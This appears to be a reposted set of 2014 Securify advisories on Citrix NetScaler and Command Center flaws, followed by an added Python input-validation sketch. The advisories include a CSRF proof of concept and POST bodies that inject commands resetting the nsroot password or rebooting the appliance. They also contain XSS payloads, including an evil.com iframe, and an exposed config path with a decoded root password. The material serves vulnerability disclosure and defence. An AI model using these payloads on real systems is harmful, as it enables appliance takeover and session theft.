Aerosol
Posted March 20, 2015

Citrix NITRO SDK Command Injection
------------------------------------------------------------------------
Command injection vulnerability in Citrix NITRO SDK xen_hotfix page
------------------------------------------------------------------------
Han Sahin, August 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Securify discovered a command injection vulnerability in the xen_hotfix
page of the NITRO SDK. The attacker-supplied command is executed with
elevated privileges (nsroot). This issue can be used to compromise the
entire Citrix SDX appliance and all underlying applications and data.
------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other
versions may also be affected.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build
52.3nc.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140806/command_injection_vulnerability_in_citrix_nitro_sdk_xen_hotfix_page.html

This vulnerability exists because the file_name parameter submitted to
the /nitro/v1/config/xen_hotfix page is used in a shell command without
proper input validation/sanitation, introducing a command execution
vulnerability. The shell command is executed with elevated privileges
(nsroot), which allows attackers to run arbitrary commands with these
privileges.
This issue can be used to compromise the entire Citrix SDX appliance and
all underlying applications and data.

The following proof of concept can be used to exploit this issue:

<html>
  <body>
    <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST">
      <input type="hidden" name="object" value="{"params":{"action":"start"},"xen_hotfix":[{"file_name":"../../etc/passwd;echo nsroot:Securify|chpasswd;"}]}" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

POST /nitro/v1/config/xen_hotfix HTTP/1.1
-----------------------------------------
object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}

or

object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]}

Due to insufficient Cross-Site Request Forgery protection, it is possible
to exploit this issue by tricking a logged-in admin user into visiting a
specially crafted web page.

Citrix Command Center Advent JMX Servlet Accessible
------------------------------------------------------------------------
Advent JMX Servlet of Citrix Command Center is accessible to
unauthenticated users
------------------------------------------------------------------------
Han Sahin, August 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Advent JMX Servlet of Citrix Command Center
is accessible to unauthenticated users.
This issue can be abused by attackers to compromise the entire
application.
------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was discovered in Citrix Command Center 5.1 build 33.3
(including patch CC_SP_5.2_40_1.exe), other versions may also be
vulnerable.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Citrix reports that this vulnerability is fixed in Command Center 5.2
build 42.7, which can be downloaded from the following location (login
required).

https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html

Citrix assigned BUG0494204 to this issue.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140804/advent_jmx_servlet_of_citrx_command_center_is_accessible_to_unauthenticated_users.html

The Advent JMX Servlet is exposed at /servlets/Jmx_dynamic. Functionality
exposed by the JMX Servlet can be invoked by an unauthenticated attacker,
which can lead to unauthorized remote code execution and compromise of
the entire application and services. In addition, this interface is also
affected by Cross-Site Scripting.
For example:

https://<target>:8443/servlets/Jmx_dynamic?fname=<script>alert(document.cookie);</script>

Citrix NetScaler VPX Cross Site Scripting
------------------------------------------------------------------------
Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting
------------------------------------------------------------------------
Han Sahin, August 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the help pages of Citrix VPX are vulnerable to
Cross-Site Scripting. This issue allows attackers to perform a wide
variety of actions, such as stealing the victim's session token or login
credentials, performing arbitrary actions on the victim's behalf, and
logging their keystrokes.
------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10,
other versions may also be vulnerable.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build
52.8nc.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.html

This issue exists because the value of the searchQuery URL parameter is
assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site
Scripting), for example:

https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTV

Tricking a victim into visiting a specially crafted URL allows attackers
to run arbitrary client-side scripting code within the victim's browser.
The attacker-supplied code can perform a wide variety of actions, such as
stealing the victim's session token or login credentials, performing
arbitrary actions on the victim's behalf, and logging their keystrokes.

Citrix NITRO SDK xen_hotfix Cross Site Scripting
------------------------------------------------------------------------
Citrix NITRO SDK xen_hotfix page is vulnerable to Cross-Site Scripting
------------------------------------------------------------------------
Han Sahin, August 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the xen_hotfix page of
the Citrix NITRO SDK. This issue allows attackers to perform a wide
variety of actions, such as stealing the victim's session token or login
credentials, performing arbitrary actions on the victim's behalf, and
logging their keystrokes.
------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other
versions may also be affected.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build
52.3nc.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140805/citrix_nitro_sdk_xen_hotfix_page_is_vulnerable_to_cross_site_scripting.html

The Cross-Site Scripting vulnerability exists because the REST interface
returns an incorrect Content-Type HTTP response header. The interface
states that the content returned is HTML, while in fact it is JSON.
Due to this it is possible to cause the browser to render the JSON
response as HTML. User input included in the JSON response is JSON
encoded, not HTML encoded. Due to this, it is possible to inject
arbitrary HTML content in the JSON data that will be rendered and
executed by the browser.

This issue is exploitable on the /nitro/v1/config/xen_hotfix page through
the file_name parameter. Below is an example HTTP response in which this
issue is demonstrated.

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 16 Jul 2014 13:54:53 GMT

{ "errorcode": 16004, "message": "Failed to obtain uuid for hotfix cmd.xsupdate<img src=a onerror=alert(document.cookie)>, error string = 'xe patch-upload file-name=\"\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>\"\r\nOperation failed. Error: file '\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>' does not exist\r\n\u001b]0;root@NetScaler-sdx:~\u0007[root@NetScaler-sdx ~]#'", "severity": "ERROR" }

Proof of concept:

<html>
  <body>
    <form id="form" method="POST" action="https://<target>/nitro/v1/config/xen_hotfix" enctype="text/plain">
      <input type="hidden" name="object" value='{"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a [{"file_name"%3a" cmd.xsupdate<img%20src%3da%20onerror%3dalert(document.cookie)>"}]}' />
      <input type="submit" value="submit">
    </form>
    <script> document.forms[0].submit(); </script>
  </body>
</html>

Citrix Command Center Configuration Disclosure
------------------------------------------------------------------------
Citrix Command Center allows downloading of configuration files
------------------------------------------------------------------------
Han Sahin, August 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that Citrix Command Center stores configuration files
containing credentials of managed devices within a folder accessible
through the web server.
Unauthenticated attackers can download any configuration file stored in
this folder, decode passwords stored in these files, and gain privileged
access to devices managed by Command Center.
------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was discovered in Citrix Command Center 5.1 build 33.3
(including patch CC_SP_5.2_40_1.exe), other versions may also be
vulnerable.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Citrix reports that this vulnerability is fixed in Command Center 5.2
build 42.7, which can be downloaded from the following location (login
required).

https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html

Citrix assigned BUG0493933 to this issue.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140802/citrix_command_center_allows_downloading_of_configuration_files.html

Configuration files can be downloaded from the conf web folder. Below is
an example of a configuration file that can be obtained this way.

https://<target>:8443/conf/securitydbData.xml

This file contains encoded passwords, for example:

<DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/>

These passwords can be decoded trivially. The algorithm used can be found
in the JAR file NmsServerClasses.jar. For example the encoded password
C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these
files can then be used to gain privileged access to devices managed by
Command Center.
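Added example, not taken from the advisories or from Citrix code: a Python sketch of how a server-side handler for the xen_hotfix request can reject the file_name values shown in the two NITRO SDK advisories above before any command is built, hand the command to the OS as an argv list instead of a shell string, and return JSON with the correct Content-Type. The "xe patch-upload file-name=/root/..." shape comes from the error string quoted in the XSS advisory; the allowlist pattern, the nosniff header and the handler structure are assumptions for illustration.

```python
import json
import re

# Allowlist for a hotfix file name: one bare path component made of
# [A-Za-z0-9._-], at most 128 characters before the .xsupdate suffix.
# The "../" and ";" payloads from the advisory fail this before any
# command string is ever built. Pattern is an assumed policy, not Citrix's.
_FILE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.xsupdate")


def validate_hotfix_file_name(file_name):
    """Return True only for a bare, allowlisted .xsupdate file name."""
    if not isinstance(file_name, str) or not _FILE_NAME_RE.fullmatch(file_name):
        return False
    # Defense in depth: reject traversal even if the pattern is later loosened.
    return "/" not in file_name and "\\" not in file_name and ".." not in file_name


def build_patch_upload_argv(file_name, root="/root"):
    """Build the xe command as an argv list (no shell); raise on bad input."""
    if not validate_hotfix_file_name(file_name):
        raise ValueError("invalid hotfix file name")
    # Handing this list to subprocess.run(argv) (not executed here) means
    # ';' or '|' would be plain characters in one argument, never shell syntax.
    return ["xe", "patch-upload", "file-name=%s/%s" % (root, file_name)]


def _json_response(status, payload):
    # Correct Content-Type plus nosniff stops a browser from rendering the
    # JSON body as HTML, the root cause of the second xen_hotfix advisory.
    headers = {"Content-Type": "application/json; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return status, headers, json.dumps(payload)


def handle_xen_hotfix(object_json):
    """Parse a NITRO 'object' body and return (status, headers, body)."""
    try:
        req = json.loads(object_json)
        file_name = req["xen_hotfix"][0]["file_name"]
    except (ValueError, KeyError, IndexError, TypeError):
        return _json_response(400, {"errorcode": 400, "message": "malformed request"})
    if not validate_hotfix_file_name(file_name):
        # Generic message: the rejected value is never echoed back to the client.
        return _json_response(400, {"errorcode": 400, "message": "invalid file_name"})
    argv = build_patch_upload_argv(file_name)
    return _json_response(200, {"errorcode": 0, "message": "queued", "argv": argv})
```

The CSRF weakness noted in the first advisory is not addressed here; that needs a per-session token or origin check on the request, independent of the file_name handling.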